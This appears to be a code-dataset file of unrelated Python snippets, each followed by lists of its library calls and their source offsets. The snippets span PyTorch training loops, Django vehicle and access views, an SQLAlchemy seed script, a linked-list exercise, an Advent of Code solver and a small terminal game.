        :param callback: The function to run. Must accept a string for the
            file path as {config_directory} + {file path}
        :return: Nothing
        """
        for root, dirs, files in os.walk(self.config_directory):
            for name in files:
                # Generator instead of a materialised list lets any()
                # short-circuit on the first matching pattern.
                if any(fnmatch.fnmatch(name, pattern)
                       for pattern in self._file_patterns):
                    callback(os.path.join(root, name))
|
[
"threading.Thread",
"watchdog.observers.polling.PollingObserver",
"watchdog.events.FileSystemEvent",
"pika.BasicProperties",
"os.path.join",
"src.utils.routing_key.get_routing_key",
"os.walk",
"time.sleep",
"os.path.normpath",
"configparser.ConfigParser",
"datetime.datetime.now",
"fnmatch.fnmatch",
"sys.exit"
] |
[((3614, 3631), 'watchdog.observers.polling.PollingObserver', 'PollingObserver', ([], {}), '()\n', (3629, 3631), False, 'from watchdog.observers.polling import PollingObserver\n'), ((11244, 11284), 'os.path.normpath', 'os.path.normpath', (['self._config_directory'], {}), '(self._config_directory)\n', (11260, 11284), False, 'import os\n'), ((11300, 11358), 'src.utils.routing_key.get_routing_key', 'routing_key.get_routing_key', (['event.src_path', 'config_folder'], {}), '(event.src_path, config_folder)\n', (11327, 11358), False, 'from src.utils import routing_key\n'), ((16105, 16115), 'sys.exit', 'sys.exit', ([], {}), '()\n', (16113, 16115), False, 'import sys\n'), ((16481, 16511), 'os.walk', 'os.walk', (['self.config_directory'], {}), '(self.config_directory)\n', (16488, 16511), False, 'import os\n'), ((10411, 10425), 'configparser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (10423, 10425), False, 'from configparser import ConfigParser, DuplicateSectionError, DuplicateOptionError, InterpolationError, ParsingError\n'), ((12420, 12441), 'watchdog.events.FileSystemEvent', 'FileSystemEvent', (['name'], {}), '(name)\n', (12435, 12441), False, 'from watchdog.events import FileSystemEvent\n'), ((14611, 14664), 'threading.Thread', 'threading.Thread', ([], {'target': 'self._sending_configs_thread'}), '(target=self._sending_configs_thread)\n', (14627, 14664), False, 'import threading\n'), ((8764, 8801), 'pika.BasicProperties', 'pika.BasicProperties', ([], {'delivery_mode': '(2)'}), '(delivery_mode=2)\n', (8784, 8801), False, 'import pika\n'), ((7021, 7062), 'time.sleep', 'time.sleep', (['RE_INITIALISE_SLEEPING_PERIOD'], {}), '(RE_INITIALISE_SLEEPING_PERIOD)\n', (7031, 7062), False, 'import time\n'), ((13923, 13964), 'time.sleep', 'time.sleep', (['RE_INITIALISE_SLEEPING_PERIOD'], {}), '(RE_INITIALISE_SLEEPING_PERIOD)\n', (13933, 13964), False, 'import time\n'), ((9380, 9394), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (9392, 9394), False, 'from datetime 
import datetime\n'), ((16568, 16598), 'fnmatch.fnmatch', 'fnmatch.fnmatch', (['name', 'pattern'], {}), '(name, pattern)\n', (16583, 16598), False, 'import fnmatch\n'), ((16690, 16714), 'os.path.join', 'os.path.join', (['root', 'name'], {}), '(root, name)\n', (16702, 16714), False, 'import os\n')]
|
import time
import os
# ANSI SGR escape sequences used to colour terminal output.
# Bright foreground colours:
red = "\033[0;91m"
green = "\033[0;92m"
yellow = "\033[0;93m"
blue = "\033[0;94m"
magenta = "\033[0;95m"
cyan = "\033[0;96m"
white = "\033[0;97m"
# Background colours:
blue_back="\033[0;44m"
orange_back="\033[0;43m"
red_back="\033[0;41m"
grey_back="\033[0;40m"
def clear():
    """Clear the terminal screen.

    Bug fix: the original body was the bare expression `clear` (a reference
    to the function itself) — a no-op, so the screen was never cleared even
    though the script calls clear() throughout. Invoke the shell command
    instead, matching the script's existing use of os.system.
    """
    os.system("clear")
def welcome():
    """Print the game's ASCII-art title banner."""
    banner = (
        blue + "  ______           _                       _____ _           ",
        " | ___ \          (_)                     /  ___(_)          ",
        " | |_/ /_   _ ___ _ _ __   ___  ___ ___   \ `--. _ _ __ ___  ",
        " | ___ \ | | / __| | '_ \ / _ \/ __/ __|   `--. \ | '_ ` _ \ ",
        " | |_/ / |_| \__ \ | | | |  __/\__ \__ \  /\__/ / | | | | | |",
        " \____/ \__,_|___/_|_| |_|\___||___/___/\_ ",
    )
    print("Welcome to...")
    for row in banner:
        print(row)
# --- interactive entry point ---------------------------------------------
clear()
welcome()
input()
clear()

username = input(green + "Welcome, before we get started,\nplease tell me your (user) name- ").capitalize()

# Reject too-short or joke names before continuing.
if len(username) < 3 or username == "Yeet" or username == "Ur mom":
    print(red + "Thats not a name silly")
    time.sleep(1)
    clear()
elif username == "Cal":
    os.system("python3 game.py")
else:
    store = input("What's the store called- ")
    print(magenta + "\nGreeting's", username, "and welcome to " + store + "...")
    time.sleep(3)
    print("I am giving you the role of manager for this shop. You can set prices, sell items, and that sort of thing. I'm sure you're very eager to begin.")
    story = input("Would you like to take on your role as manager- ").lower()
    if story == "yes" or story == "yep" or story == "y":
        # Bug fix: this branch launched "python game.py" while the "Cal"
        # branch above used "python3 game.py"; on systems where `python`
        # is Python 2 (or absent) the game would fail to start. Use
        # python3 consistently.
        os.system("python3 game.py")
    elif story == "no":
        print("Ok")
        time.sleep(2)
        clear()
    else:
        print("Try again")
|
[
"os.system",
"time.sleep"
] |
[((1008, 1021), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (1018, 1021), False, 'import time\n'), ((1056, 1084), 'os.system', 'os.system', (['"""python3 game.py"""'], {}), "('python3 game.py')\n", (1065, 1084), False, 'import os\n'), ((1207, 1220), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (1217, 1220), False, 'import time\n'), ((1503, 1530), 'os.system', 'os.system', (['"""python game.py"""'], {}), "('python game.py')\n", (1512, 1530), False, 'import os\n'), ((1571, 1584), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (1581, 1584), False, 'import time\n')]
|
"""
Problem: given the head node `head` of a linked list, implement a function
that deletes the middle node of the list. For example:
    empty list / single node: delete nothing;
    1->2: delete node 1;
    1->2->3: delete node 2;
    1->2->3->4: delete node 2;
    1->2->3->4->5: delete node 3;

Follow-up:
Given the head node `head` and integers a and b, implement a function that
deletes the node at the a/b position. For example:
    For the list 1->2->3->4->5, let r = a/b.
    If r equals 0, delete nothing;
    if r is in (0, 1/5], delete node 1;
    if r is in (1/5, 2/5], delete node 2;
    if r is in (2/5, 3/5], delete node 3;
    if r is in (3/5, 4/5], delete node 4;
    if r is in (4/5, 1], delete node 5;
    if r is greater than 1, delete nothing.
"""
import math
from linkedlist.toolcls import PrintMixin
class Node:
    """A singly linked list node holding a value and a `next` pointer."""

    def __init__(self, value):
        self.value, self.next = value, None
class RemoveNode(PrintMixin):
    """Linked-list deletion helpers (see the module docstring for the spec)."""

    @classmethod
    def remove_mid_node(cls, head):
        """Delete the middle node and return the (possibly new) head.

        Lists of length 0 or 1 are returned untouched; for length 2 the
        first node is dropped.
        """
        if head is None or head.next is None:
            return head
        if head.next.next is None:
            return head.next
        # `fast` moves two nodes per step, `slow` one: when `fast` reaches
        # the tail, `slow` sits just before the middle node.
        slow = head
        fast = head.next.next
        while fast.next is not None and fast.next.next is not None:
            slow = slow.next
            fast = fast.next.next
        slow.next = slow.next.next
        return head

    @classmethod
    def remove_k_node(cls, head, a, b):
        """Delete the node at fractional position a/b and return the head."""
        if b == 0:
            raise RuntimeError('b can"t be 0')
        if head is None or a > b or a == 0:
            return head
        # Count the nodes first.
        length = 0
        walker = head
        while walker is not None:
            length += 1
            walker = walker.next
        # 1-based index of the node to delete.
        target = math.ceil(a / b * length)
        if target == 1:
            return head.next
        # Advance to the node just before the target and unlink it.
        prev = head
        for _ in range(target - 2):
            prev = prev.next
        prev.next = prev.next.next
        return head
if __name__ == '__main__':
    # Build the demo list 1 -> 2 -> 3 -> 4 -> 5 -> 6.
    head = Node(1)
    tail = head
    for value in range(2, 7):
        tail.next = Node(value)
        tail = tail.next
    RemoveNode.remove_mid_node(head)
    RemoveNode.remove_k_node(head, 2, 5)
    RemoveNode.print_list(head)
|
[
"math.ceil"
] |
[((1269, 1289), 'math.ceil', 'math.ceil', (['(a / b * n)'], {}), '(a / b * n)\n', (1278, 1289), False, 'import math\n')]
|
from collections import Counter
from days import AOCDay, day
@day(8)
class Day8(AOCDay):
    """AoC 2019 day 8 (Space Image Format): decode a flat digit string into
    width x height layers, find the layer with the fewest zeroes (part 1)
    and flatten the layers into the final image (part 2)."""
    test_input = """123456789012"""
    test_input2 = """0222112222120000"""

    # Image dimensions of the real puzzle input.
    width = 25
    height = 6

    # Pixel colour codes.
    BLACK = "0"
    WHITE = "1"
    TRANSPARENT = "2"

    image_data = []
    final_image = []

    def common(self, input_data):
        """Split `input_data` into layers of `height` rows x `width` digits."""
        self.image_data = []
        i = 0
        layer = -1
        while i < len(input_data):
            layer += 1
            self.image_data.append([])
            for y in range(self.height):
                self.image_data[layer].append([])
                for x in range(self.width):
                    self.image_data[-1][-1].append(input_data[i])
                    i += 1

    def part1(self, input_data):
        """Yield (#ones * #twos) of the layer containing the fewest zeroes."""
        fewest_zeroes = None
        fewest_layer = None
        for i, layer in enumerate(self.image_data):
            layer = list("".join("".join(line) for line in layer))
            c = Counter(layer)
            amount = c.get("0", 0)
            if fewest_zeroes is None or amount < fewest_zeroes:
                # Bug fix: report the new best count (`amount`); the original
                # printed `fewest_zeroes`, i.e. the *previous* best, which is
                # None on the first layer.
                print("new best layer {} with {} zeroes".format(i, amount))
                fewest_zeroes = amount
                fewest_layer = c
        # Bug fix: the "twos" figure must come from key "2"; the original
        # printed the zero count again via key "0".
        print("has {} ones and {} twos".format(fewest_layer.get("1"),
                                               fewest_layer.get("2")))
        yield fewest_layer.get("1", 0) * fewest_layer.get("2", 0)

    def part2(self, input_data):
        """Yield the flattened image: per pixel, the first non-transparent
        value when scanning the layers front to back."""
        # Bug fix: rebuild the image per run instead of appending to the
        # shared class-level list, which accumulated rows on repeated runs.
        self.final_image = []
        # Generate empty (fully transparent) image.
        for y in range(self.height):
            self.final_image.append([])
            for x in range(self.width):
                self.final_image[-1].append(self.TRANSPARENT)

        for y in range(self.height):
            for x in range(self.width):
                for layer in self.image_data:
                    # Bug fix: the original `break` was unconditional at the
                    # loop level, so only the first layer was ever consulted.
                    # Stop only once the pixel has been determined.
                    if self.final_image[y][x] != self.TRANSPARENT:
                        break
                    if layer[y][x] != self.TRANSPARENT:
                        self.final_image[y][x] = layer[y][x]

        yield "\n".join("".join(x) for x in self.final_image).replace("0", " ").replace("1", "#").replace("2", " ")
|
[
"collections.Counter",
"days.day"
] |
[((65, 71), 'days.day', 'day', (['(8)'], {}), '(8)\n', (68, 71), False, 'from days import AOCDay, day\n'), ((944, 958), 'collections.Counter', 'Counter', (['layer'], {}), '(layer)\n', (951, 958), False, 'from collections import Counter\n')]
|
#############################
# #
# DFIRTrack config file #
# #
#############################
from os.path import expanduser
# MAIN APP SETTINGS
## change path for the log file (default: `$HOME`) (used in `dfirtrack.settings`)
LOGGING_PATH = expanduser('~')

# ARTIFACTS
## folder to store artifacts on DFIRTrack server (used in `dfirtrack_artifacts.models` and `dfirtrack_main.models`)
EVIDENCE_PATH = '{0}/dfirtrack_artifact_storage'.format(expanduser('~'))
# deprecated, TODO: possibly use regarding tag handling (dfirtrack_main.importer.file.csv.system)
## add a list of strings representing the relevant tags you want to automatically import
#TAGLIST = []
## add a string used as prefix for clearly identifying previously automatically imported tags (e. g. "AUTO" leads to "AUTO_TAG")
#TAGPREFIX = ''
|
[
"os.path.expanduser"
] |
[((301, 316), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (311, 316), False, 'from os.path import expanduser\n'), ((462, 477), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (472, 477), False, 'from os.path import expanduser\n')]
|
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from LMS.model.models import Course
from LMS.model.models import Group
from LMS.model.models import Student
from LMS.model.models import Tutor
from LMS.model.models import User
db_url = os.getenv('DATABASE_URL')
engine = create_engine(db_url, echo=True)
Session = sessionmaker(bind=engine)
session = Session()

# Group numbering convention:
#   first digit  - the degree: 1 for Bachelor, 2 for Master, 3 for Specialist
#   second digit - the entry year: group 291 entered in 2019
#   third digit  - the number of the group within that year
group191 = Group(num=191, degree="Bachelor", grade=1)
group281 = Group(num=281, degree="Master", grade=2)

# Users: John has not completed registration yet, Alice and Ann have.
john = User(id=1, name="John", family_name="Smith",
            verification_code="john12", is_registered=False)
alice = User(id=2, name="Alice", family_name="Turner",
             middle_name="Sergeevna", verification_code="alice12",
             email="<EMAIL>", password="<PASSWORD>", is_registered=True)
ann = User(id=3, name="Ann", family_name="Wells", middle_name="Sara",
           verification_code="ann12", email="<EMAIL>",
           password="<PASSWORD>",
           facebook_link="https://facebook.com/annawells", is_registered=True)

session.add_all([group191, group281, john, alice, ann])

# Students and the tutor reference the users/groups created above.
student_john = Student(user_id=john.id, group_num=group191.num,
                       entry_year=2019, is_pay=1)
student_alice = Student(user_id=alice.id, group_num=group191.num,
                        entry_year=2019, is_pay=0)

math_course = Course(
    id=1,
    name="Mathematics",
    description="Introduction into mathematical analysis and linear algebra",
)
mem_course = Course(
    id=42,
    name="Higher Memology",
    description="The most interesting aspects of modern memes. "
                "The basic knowledge of memology is obligatory",
)
philosophy_course = Course(id=2, name="Philosophy and history of science")
tutor_ann = Tutor(user_id=ann.id, course_id=philosophy_course.id)

session.add_all([
    student_alice, student_john, tutor_ann, math_course, mem_course,
    philosophy_course
])
session.commit()
|
[
"LMS.model.models.Course",
"LMS.model.models.Student",
"LMS.model.models.Group",
"LMS.model.models.User",
"LMS.model.models.Tutor",
"sqlalchemy.create_engine",
"sqlalchemy.orm.sessionmaker",
"os.getenv"
] |
[((276, 301), 'os.getenv', 'os.getenv', (['"""DATABASE_URL"""'], {}), "('DATABASE_URL')\n", (285, 301), False, 'import os\n'), ((312, 344), 'sqlalchemy.create_engine', 'create_engine', (['db_url'], {'echo': '(True)'}), '(db_url, echo=True)\n', (325, 344), False, 'from sqlalchemy import create_engine\n'), ((355, 380), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (367, 380), False, 'from sqlalchemy.orm import sessionmaker\n'), ((590, 632), 'LMS.model.models.Group', 'Group', ([], {'num': '(191)', 'degree': '"""Bachelor"""', 'grade': '(1)'}), "(num=191, degree='Bachelor', grade=1)\n", (595, 632), False, 'from LMS.model.models import Group\n'), ((644, 684), 'LMS.model.models.Group', 'Group', ([], {'num': '(281)', 'degree': '"""Master"""', 'grade': '(2)'}), "(num=281, degree='Master', grade=2)\n", (649, 684), False, 'from LMS.model.models import Group\n'), ((693, 790), 'LMS.model.models.User', 'User', ([], {'id': '(1)', 'name': '"""John"""', 'family_name': '"""Smith"""', 'verification_code': '"""john12"""', 'is_registered': '(False)'}), "(id=1, name='John', family_name='Smith', verification_code='john12',\n is_registered=False)\n", (697, 790), False, 'from LMS.model.models import User\n'), ((818, 986), 'LMS.model.models.User', 'User', ([], {'id': '(2)', 'name': '"""Alice"""', 'family_name': '"""Turner"""', 'verification_code': '"""alice12"""', 'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""', 'middle_name': '"""Sergeevna"""', 'is_registered': '(True)'}), "(id=2, name='Alice', family_name='Turner', verification_code='alice12',\n email='<EMAIL>', password='<PASSWORD>', middle_name='Sergeevna',\n is_registered=True)\n", (822, 986), False, 'from LMS.model.models import User\n'), ((1020, 1226), 'LMS.model.models.User', 'User', ([], {'id': '(3)', 'name': '"""Ann"""', 'family_name': '"""Wells"""', 'middle_name': '"""Sara"""', 'verification_code': '"""ann12"""', 'email': '"""<EMAIL>"""', 'password': '"""<PASSWORD>"""', 
'facebook_link': '"""https://facebook.com/annawells"""', 'is_registered': '(True)'}), "(id=3, name='Ann', family_name='Wells', middle_name='Sara',\n verification_code='ann12', email='<EMAIL>', password='<PASSWORD>',\n facebook_link='https://facebook.com/annawells', is_registered=True)\n", (1024, 1226), False, 'from LMS.model.models import User\n'), ((1330, 1405), 'LMS.model.models.Student', 'Student', ([], {'user_id': 'john.id', 'group_num': 'group191.num', 'entry_year': '(2019)', 'is_pay': '(1)'}), '(user_id=john.id, group_num=group191.num, entry_year=2019, is_pay=1)\n', (1337, 1405), False, 'from LMS.model.models import Student\n'), ((1491, 1567), 'LMS.model.models.Student', 'Student', ([], {'user_id': 'alice.id', 'group_num': 'group191.num', 'entry_year': '(2019)', 'is_pay': '(0)'}), '(user_id=alice.id, group_num=group191.num, entry_year=2019, is_pay=0)\n', (1498, 1567), False, 'from LMS.model.models import Student\n'), ((1655, 1766), 'LMS.model.models.Course', 'Course', ([], {'id': '(1)', 'name': '"""Mathematics"""', 'description': '"""Introduction into mathematical analysis and linear algebra"""'}), "(id=1, name='Mathematics', description=\n 'Introduction into mathematical analysis and linear algebra')\n", (1661, 1766), False, 'from LMS.model.models import Course\n'), ((1790, 1956), 'LMS.model.models.Course', 'Course', ([], {'id': '(42)', 'name': '"""Higher Memology"""', 'description': '"""The most interesting aspects of modern memes. The basic knowledge of memology is obligatory"""'}), "(id=42, name='Higher Memology', description=\n 'The most interesting aspects of modern memes. 
The basic knowledge of memology is obligatory'\n )\n", (1796, 1956), False, 'from LMS.model.models import Course\n'), ((1984, 2038), 'LMS.model.models.Course', 'Course', ([], {'id': '(2)', 'name': '"""Philosophy and history of science"""'}), "(id=2, name='Philosophy and history of science')\n", (1990, 2038), False, 'from LMS.model.models import Course\n'), ((2052, 2105), 'LMS.model.models.Tutor', 'Tutor', ([], {'user_id': 'ann.id', 'course_id': 'philosophy_course.id'}), '(user_id=ann.id, course_id=philosophy_course.id)\n', (2057, 2105), False, 'from LMS.model.models import Tutor\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 05 23:55:12 2018
@author: <NAME>, <NAME>
"""
import sys
import numpy as np
import torch
import torch.nn as nn
# Training
def train(args, model, device, train_loader, optimizer, epoch, iteration):
    """Train `model` for one epoch over `train_loader`.

    Args:
        args: namespace with a `log_interval` attribute controlling how
            often progress is written to stdout.
        model: network to optimise.
        device: torch device (or device string) batches are moved to.
        train_loader: iterable yielding dicts with "image" and "label"
            tensors.
        optimizer: optimiser stepping the model parameters.
        epoch: current epoch number (used for logging only).
        iteration: running global iteration counter.

    Returns:
        The updated iteration counter. (The original incremented a local
        copy but never returned it, so callers could not track it; returning
        it is backward-compatible since the old return value was None.)
    """
    model.train()
    # `size_average=True` was deprecated in PyTorch; reduction='mean' is the
    # exact equivalent (per-batch mean loss).
    criterion = nn.CrossEntropyLoss(reduction='mean')
    for i_batch, sample_batched in enumerate(train_loader):
        data = sample_batched["image"].to(device)
        target = sample_batched["label"].to(device)
        optimizer.zero_grad()
        output = model(data)
        pred = output.max(1, keepdim=True)[1]
        correct = pred.eq(target.view_as(pred)).sum().item()
        loss = criterion(output, target)
        loss.backward()
        optimizer.step()
        if i_batch % args.log_interval == 0:
            # Fixed typo in the progress message ("accracy" -> "accuracy").
            sys.stdout.write(
                "\repoch:{0:>3} iteration:{1:>6} train_loss: {2:.6f} train_accuracy: {3:5.2f}%".format(
                    epoch, iteration, loss.item(),
                    100. * correct / float(len(sample_batched["label"]))))
            sys.stdout.flush()
        iteration += 1
    return iteration
# Validation
def val(args, model, device, test_loader, iteration):
    """Evaluate `model` over `test_loader` without updating weights.

    Args:
        args: unused (kept for signature symmetry with train()).
        model: network to evaluate.
        device: torch device (or device string) batches are moved to.
        test_loader: iterable yielding dicts with "image" and "label"
            tensors; must expose a `dataset` attribute with a length.
        iteration: unused (kept for signature symmetry with train()).

    Returns:
        Tuple (mean test loss, accuracy in percent).
    """
    model.eval()
    # `size_average=False` was deprecated in PyTorch; reduction='sum' is the
    # exact equivalent — per-batch losses are summed here and normalised by
    # the dataset size below.
    criterion = nn.CrossEntropyLoss(reduction='sum')
    test_loss = 0
    correct = 0
    with torch.no_grad():
        for i_batch, sample_batched in enumerate(test_loader):
            data = sample_batched["image"].to(device)
            target = sample_batched["label"].to(device)
            output = model(data)
            test_loss += criterion(output, target).item()
            pred = output.max(1, keepdim=True)[1]
            correct += pred.eq(target.view_as(pred)).sum().item()
    test_loss /= float(len(test_loader.dataset))
    correct /= float(len(test_loader.dataset))
    print("\nValidation: Accuracy: {0:.2f}% test_loss: {1:.6f}".format(100. * correct, test_loss))
    return test_loss, 100. * correct
|
[
"torch.no_grad",
"torch.nn.CrossEntropyLoss",
"sys.stdout.flush"
] |
[((274, 312), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'size_average': '(True)'}), '(size_average=True)\n', (293, 312), True, 'import torch.nn as nn\n'), ((1116, 1155), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'size_average': '(False)'}), '(size_average=False)\n', (1135, 1155), True, 'import torch.nn as nn\n'), ((1265, 1280), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1278, 1280), False, 'import torch\n'), ((985, 1003), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1001, 1003), False, 'import sys\n')]
|
from ising import *
import os
import numpy as np
Ns = [10, 20, 50, 100, 1000]  # system sizes to sweep
T_Tcs = np.linspace(0.5, 1.7, 30)  # reduced temperatures T/Tc
Tc = 2.268  # Onsager's critical temperature

for n in Ns:
    for i, T_Tc in enumerate(T_Tcs):
        T = T_Tc * Tc
        wd = 'magnetization/size-{0}/temp-{1}'.format(n, i)
        if not os.path.exists(wd):
            os.makedirs(wd)
        steps = n * 1000000
        if n == 1000:
            # Largest system: single process on the long queue.
            write_job_script(wd=wd, n=n, s=steps, T=T, i=i, nprocs=1, q='long')
        else:
            write_job_script(wd=wd, n=n, s=steps, T=T, i=i)
        run_job(wd)
|
[
"os.path.exists",
"os.makedirs",
"numpy.linspace"
] |
[((102, 127), 'numpy.linspace', 'np.linspace', (['(0.5)', '(1.7)', '(30)'], {}), '(0.5, 1.7, 30)\n', (113, 127), True, 'import numpy as np\n'), ((309, 327), 'os.path.exists', 'os.path.exists', (['wd'], {}), '(wd)\n', (323, 327), False, 'import os\n'), ((342, 357), 'os.makedirs', 'os.makedirs', (['wd'], {}), '(wd)\n', (353, 357), False, 'import os\n')]
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class GRLog(torch.autograd.Function):
    """Gradient-reversal op (legacy autograd API): identity on the forward
    pass; the backward pass scales gradients by -lambd. If `grad_log` is a
    list, the *incoming* gradient is recorded before reversal."""

    def __init__(self, lambd=1., grad_log=None):
        self.lambd = lambd
        self.grad_log = grad_log

    def forward(self, x):
        # Identity — all the interesting work happens in backward().
        return x

    def backward(self, grad_output):
        log = self.grad_log
        if log is not None:
            log.append(grad_output)
        return -self.lambd * grad_output
class GRandAdd(torch.autograd.Function):
    """Identity forward; backward adds uniform noise scaled by the mean of
    the incoming gradient. The perturbed gradient is optionally recorded in
    `grad_log`."""

    def __init__(self, lambd=1., grad_log=None):
        self.lambd = lambd
        self.grad_log = grad_log

    def forward(self, x):
        # Identity — the perturbation is applied on the backward pass.
        return x

    def backward(self, grad_output):
        noise = torch.rand_like(grad_output) * torch.mean(grad_output)
        perturbed = grad_output + noise
        if self.grad_log is not None:
            self.grad_log.append(perturbed)
        return perturbed
class GRandMult(torch.autograd.Function):
def __init__(self, lambd=1., grad_log=None):
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = grad_output * (torch.rand_like(grad_output) - 1) * 2
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
class GRandSign(torch.autograd.Function):
def __init__(self, lambd=1., grad_log=None):
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = grad_output * torch.sign(torch.rand_like(grad_output) - 1) * self.lambd
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
class GRand(torch.autograd.Function):
def __init__(self, alpha=1., lambd=1., grad_log=None):
self.alpha = alpha
self.lambd = lambd
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = (torch.rand_like(grad_output) - 1) * self.alpha * self.lambd
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
class GRInv(torch.autograd.Function):
def __init__(self, alpha=1., lambd=1., grad_log=None):
self.lambd = lambd
self.alpha = alpha
self.grad_log = grad_log
def forward(self, x):
return x
def backward(self, grad_output):
new_grad = (torch.max(torch.abs(grad_output), 1)[0].unsqueeze(1) * torch.sign(grad_output) - grad_output) * self.alpha * self.lambd
if self.grad_log is not None:
self.grad_log.append(new_grad)
return new_grad
|
[
"torch.mean",
"torch.rand_like",
"torch.abs",
"torch.sign"
] |
[((630, 658), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (645, 658), False, 'import torch\n'), ((661, 684), 'torch.mean', 'torch.mean', (['grad_output'], {}), '(grad_output)\n', (671, 684), False, 'import torch\n'), ((1008, 1036), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (1023, 1036), False, 'import torch\n'), ((1758, 1786), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (1773, 1786), False, 'import torch\n'), ((1377, 1405), 'torch.rand_like', 'torch.rand_like', (['grad_output'], {}), '(grad_output)\n', (1392, 1405), False, 'import torch\n'), ((2207, 2230), 'torch.sign', 'torch.sign', (['grad_output'], {}), '(grad_output)\n', (2217, 2230), False, 'import torch\n'), ((2162, 2184), 'torch.abs', 'torch.abs', (['grad_output'], {}), '(grad_output)\n', (2171, 2184), False, 'import torch\n')]
|
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.views.generic import ListView, DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from django.urls import reverse_lazy
from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin
from datetime import datetime
# Export XLSX
from steller.exports import exportXlsx
from steller.prints import printPdf
# My Files
from .models import Vehicle, Access
from accessApp.types.VehicleType import VehicleForm
from accessApp.types.AccessType import CrateAccessForm, AccessForm
from accessApp.repository import VehicleRepository
from accessApp.repository import AccessRepository
# Vehicle
class VehicleListView(LoginRequiredMixin, ListView):
model = Vehicle
template_name = 'vehicle/index.html'
paginate_by = 10
def get_queryset(self):
new_context = VehicleRepository.get_query_filter(self.request)
return new_context
def get_context_data(self, **kwargs):
context = VehicleRepository.get_context(self, VehicleListView)
return context
@login_required
def export_vehicles(request):
model = 'Vehicle'
filename = 'veiculos_exportados'
queryset = VehicleRepository.get_query_filter_export(request)
columns = ('Placa', 'Dono', 'Descrição')
response = exportXlsx(model, filename, queryset, columns)
return response
@login_required
def print_vehicles(request):
queryset = VehicleRepository.get_query_filter(request)
template = 'vehicle/print.html'
filename = 'steller-veículos'
return printPdf(request, filename, queryset, template)
class VehicleCreateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, CreateView):
permission_required = 'accessApp.add_vehicle'
model = Vehicle
form_class = VehicleForm
template_name = 'vehicle/new.html'
success_message = '%(field)s - criado com sucesso'
success_url = reverse_lazy('vehicle_index')
def get_context_data(self, **kwargs):
context = super(VehicleCreateView, self).get_context_data(**kwargs)
context['page_name'] = 'Veículos'
context['menu_vehicle'] = 'active'
return context
def get_success_message(self, cleaned_data):
return self.success_message % dict(
cleaned_data,
field=self.object.plate,
)
def form_valid(self, form):
self.object = form.save()
plate = self.object.plate
Access.objects.filter(plate=plate).update(vehicle=self.object.pk)
return super(VehicleCreateView, self).form_valid(form)
class VehicleUpdateView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, UpdateView):
permission_required = 'accessApp.change_vehicle'
model = Vehicle
form_class = VehicleForm
template_name = 'vehicle/edit.html'
success_message = '%(field)s - editado com sucesso'
success_url = reverse_lazy('vehicle_index')
def get_context_data(self, **kwargs):
context = super(VehicleUpdateView, self).get_context_data(**kwargs)
context['page_name'] = 'Veículos'
context['menu_vehicle'] = 'active'
return context
def get_success_message(self, cleaned_data):
return self.success_message % dict(
cleaned_data,
field=self.object.plate,
)
class VehicleDeleteView(LoginRequiredMixin, PermissionRequiredMixin, SuccessMessageMixin, DeleteView):
permission_required = 'accessApp.delete_vehicle'
model = Vehicle
template_name = 'vehicle/delete.html'
success_url = reverse_lazy('vehicle_index')
success_message = 'Deletado com sucesso'
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
self.object.is_active = False
self.object.save()
messages.success(self.request, self.success_message)
return HttpResponseRedirect(self.get_success_url())
# End Vehicle
# Access
class AccessListView(LoginRequiredMixin, ListView):
model = Access
template_name = 'access/index.html'
paginate_by = 10
def get_queryset(self):
new_context = AccessRepository.get_query_filter(self.request)
return new_context
def get_context_data(self, **kwargs):
context = AccessRepository.get_context(self, AccessListView)
return context
class AccessTodayListView(LoginRequiredMixin, ListView):
model = Access
template_name = 'access/index.html'
paginate_by = 10
def get_queryset(self):
new_context = AccessRepository.get_query_today()
return new_context
def get_context_data(self, **kwargs):
context = AccessRepository.get_context_today(self, AccessTodayListView)
return context
class AccessNotExitListView(LoginRequiredMixin, ListView):
model = Access
template_name = 'access/index.html'
paginate_by = 10
def get_queryset(self):
new_context = AccessRepository.get_query_not_exit()
return new_context
def get_context_data(self, **kwargs):
context = AccessRepository.get_context_not_exit(self, AccessNotExitListView)
return context
@login_required
def export_access(request):
model = 'Access'
filename = 'acessos_exportados'
queryset = AccessRepository.get_query_export(request)
columns = ('Placa', 'Usuário', 'Entrada', 'Saída')
response = exportXlsx(model, filename, queryset, columns)
return response
@login_required
def print_access(request):
queryset = AccessRepository.get_query_filter(request)
template = 'access/print.html'
filename = 'steller-acessos'
return printPdf(request, filename, queryset, template)
